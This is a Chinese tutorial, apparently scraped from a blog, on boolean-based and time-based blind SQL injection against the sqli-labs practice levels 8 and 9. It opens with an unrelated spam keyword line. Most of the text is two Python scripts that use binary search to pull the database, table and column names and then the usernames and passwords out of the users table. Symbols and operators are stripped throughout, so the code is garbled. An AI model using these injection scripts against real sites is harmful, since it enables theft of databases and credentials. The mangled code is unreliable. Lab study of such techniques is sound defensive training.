php宠物用品公司网站源码,地推是什么意思,外贸英文网站,如何建设网站安全管理制度一、布尔盲注
布尔盲注#xff08;Boolean-based Blind SQL Injection#xff09;是一种SQL注入技术#xff0c;用于在应用程序不直接显示数据库查询结果的情况下#xff0c;通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的…一、布尔盲注
布尔盲注Boolean-based Blind SQL Injection是一种SQL注入技术用于在应用程序不直接显示数据库查询结果的情况下通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的结果是否为真或假进而推断出数据库中的具体信息。
案例为sqlilabs中的第八关采用二分查找
python脚本
import requests
def get_database(URL):# 获取数据库名称s for i in range(1, 10):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and greatest(ascii(substr(database(),{i},1)),{mid}){mid} -- } # 相当于第一个字符{mid}条件判断为真res requests.get(urlURL, paramspayload)if You are in in res.text:high midmid (low high) // 2else:low mid 1mid (low high) // 2s chr(mid)print(数据库名称: s)def get_table(URL):# 获取表名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema\security\),{i},1)){mid} -- }res requests.get(urlURL, paramspayload)if You are in in res.text:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(表的名称: s)def get_column(URL):# 获取管理员的字段名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema\security\ and table_name\users\),{i},1)){mid} -- }res requests.get(urlURL, paramspayload)if You are in in res.text:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users表的列: s)def get_result(URl):# 获取用户名和密码信息s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1)){mid} -- }res requests.get(urlURL, paramspayload)if You are in in res.text:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users表具体数据: s)if __name__ __main__:URL http://127.0.0.1/sqlilabs/Less-8/index.phpget_database(URL)get_table(URL)get_column(URL)get_result(URL)
运行结果
二、时间盲注
时间盲注Time-based Blind SQL Injection是一种SQL注入技术用于在应用程序没有直接回显数据库查询结果的情况下通过构造特定的SQL查询来推测数据库中的信息。这种方法依赖于数据库处理查询时产生的延迟响应来判断条件的真假。
案例为sqlilabs中的第九关同样为二分查找
python脚本
import requests
import datetimedef get_database(URL):# 获取数据库名称s for i in range(1, 10):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((greatest(ascii(substr(database(),{i},1)),{mid}){mid}),sleep(3),1) -- } # 相当于第一个字符{mid}条件判断为真start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:high midmid (low high) // 2else:low mid 1mid (low high) // 2s chr(mid)print(数据库名称: s)def get_table(URL):# 获取表名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema\security\),{i},1)){mid}),sleep(3),1) -- }start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(表的名称: s)def get_column(URL):# 获取管理员的字段名称s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema\security\ and table_name\users\),{i},1)){mid}),sleep(3),1) -- }start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users表的列: s)def get_result(URl):# 获取用户名和密码信息s for i in range(1, 32):low 32high 128mid (low high) // 2while (high low):payload {id: f1 and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1)){mid}),sleep(3),1) -- }start datetime.datetime.now()res requests.get(urlURL, paramspayload)end datetime.datetime.now()if (end - start).seconds 3:low mid 1mid (low high) // 2else:high midmid (low high) // 2s chr(mid)print(users中的具体数据: s)if __name__ __main__:URL http://127.0.0.1/sqlilabs/Less-9/index.php# get_database(URL)get_table(URL)# get_column(URL)# get_result(URL)
运行结果
